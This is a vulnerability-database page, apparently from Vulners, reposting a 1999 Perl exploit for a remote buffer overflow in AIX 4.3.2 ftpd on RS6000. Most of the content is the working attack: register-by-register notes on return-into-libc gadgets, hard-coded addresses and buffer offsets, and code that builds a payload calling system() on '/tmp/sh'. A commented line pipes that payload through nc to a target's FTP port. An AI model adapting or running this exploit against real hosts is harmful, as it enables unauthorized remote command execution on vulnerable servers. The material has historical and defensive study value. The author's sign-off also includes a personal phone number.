Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

AIX_ftpd_bof_exploit.txt

🗓️ 04 Oct 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 44 Views

Remote buffer overflow exploit for AIX 4.3.2 ftpd on RS6000, crafted for single system usage.

Code
`One of our crewmembers wrote this exploit for the Hack-me project during  
HIT2000,  
I searched on securityfocus and saw it was still not mailed over here.  
IBM has been mailed but due lack of RS6000 knowledge they didn't get it  
working.....  
  
#!/usr/bin/perl  
# *** Synnergy Networks  
  
# * Description:  
#  
# Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an  
# RS6000. (power)  
# This is an return into libc exploit specificly crafted for  
# one box and it is very unlikely to work on another box  
  
# * Author:  
#  
# dvorak ([email protected])  
# Synnergy Networks (c) 1999, http://www.synnergy.net  
  
# * Greets:  
#  
# Synnergy Networks, Hit2000 crew, Emphyrio, shevek  
  
# * Comments:  
#  
# A full working exploit will be released later on.  
# The addresses point to positions in the program or libraries,  
# only the relevant instructions are shown also note that b r0  
# is in fact something like mfsbr r0, bsbr or what that is in  
# RS6000 assembly.  
#  
# The final call is to system which needs the following arguments:  
# r3 = address of command to execute  
# r2 = TOC (what is TOC anyway), I don't know if it does matter but  
# we set it anyway (we can so why not do it)  
# r1 = SP but this is ok already,  
# the rest is free so it seems.  
#  
# Our route:  
# 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228  
# 0x10015228: loads r12 with a value from our buffera  
# loads r0 with the next address to jump to (0x1001038c)  
# and sets r2 to another place in our buffer  
# 0x1001038c: sets r3 to a place in the buffer (finally!)  
# sets r0 to next address to jump to (0xd00406d4, system(...))  
#  
# The flow with registers is thus:  
# r2 = 0x14(r1)  
# r12 = 0x110(r2)  
# r0 = 0x0(r12)  
# r2 = 0x4(r12)  
# r3 = 0x40(r1)  
# r12 = 0x3c(r2)  
# 0x14(r1) = r12 this is the plave where TOC is stored but it doesn't seem  
# to matter  
# r0 = 0x0(12)  
# r2 = 0x04(r12)  
# and of we go...  
#  
# We set:  
# $buf = the buffer on the stack $buf[0] is the first byte in the buffer  
# but we will count offsets from 4 (the first 4 bytes is just "CEL " is  
# doesn't matter, only the space does (it makes sure the rest of the buffer)  
# stays the way it is and isn't converted into lower case  
#  
# Offsets:  
# 0x000: 0x1001038c  
# 0x004: buf[0]  
# 0x008: this is the place where the address of the systemcall is taken from  
# 0xd00406d4 in our case# 0x00c: thi is the address where r2 is  
loaded  
# from just before the call to  
# system(..) we set it to the TOC in our program we don't know if it  
# matters and if the TOC is constant between hosts  
# 0x03c: buf[08]  
# 0x110: buf[0]  
# 0x204: return address (0x10010150)  
# 0x210: buf[0]  
# 0x23c: buf[0x240]  
# 0x240: "/tmp/sh" or whatever command you want to execute  
# r1 points to buf[0x1fc]  
#  
# I assume the positions in the libraries/program are fixed and that TOC  
# either doesn't matter or is fixed to please enlighten me on these topics.  
#  
# 0x10010150:  
# l r2, 0x14(r1)  
# b 0x10015228  
# 0x10015228:  
# l r12, 0x110(r2)  
# st r12, 0x14(r1)  
# l r0, 0x0(r12)  
# l r2, 0x4(r12)  
# b r0  
# 0x1001038c:  
# l r3, 0x40(r1)  
# b 0x100136f8  
# 0x100136f8:  
# l r12, 0x3c(r2)  
# st r12, 0x14(r1)  
# l r0, 0x0(r12)  
# l r2, 0x04(r12)  
  
# *** Synnergy Networks  
  
$bufstart = 0x2ff22724; # this is our first guess  
$nop = "\xde\xad\xca\xfe";  
$buf = "CEL ";  
$buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of  
# 'borrowed' code  
$buf .= pack ("N", $bufstart); # 4  
$buf .= "\xd0\x04\x06\xd4"; # 8 system call..  
$buf .= "\xf0\x14\x63\x5c"; # c TOC  
$offset = 0x10;  
while ($offset < 0x3c) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= pack ("N", $bufstart + 0x008);  
$offset += 4;  
while ($offset < 0x110) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= pack ("N", $bufstart);  
$offset += 4;  
while ($offset < 0x204) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= "\x10\x01\x01\x50";  
$offset += 4;  
while ($offset < 0x210) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= pack ("N", $bufstart);  
$offset += 4;  
while ($offset < 0x23c) {  
$offset += 4;  
$buf .= $nop;  
}  
$buf .= pack ("N", $bufstart + 0x240);  
$offset += 4;  
while ($offset < 0x240) {  
$offset += 4;  
$buf .= $nop;  
}  
# this is the command that will be run through system  
$buf .= "/tmp/sh";  
$buf .= "\n";  
  
# offcourse you should change this .  
# open F, "| nc -v -v -n 192.168.2.12 21";  
open F, "| od -tx1";  
printf F $buf;  
close F;  
  
# EOF  
  
gtx,  
Gerrie  
Mijn antwoorden & uitspraken zijn geheel voor eigen rekening.  
tel. 06-24119524  
Fun & Secure  
http://www.hit2000.org  
Join our RC5 Team!  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Oct 1999 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflow exploitaix ftpdrs6000 systemsynnergy networkshit2000 project.
44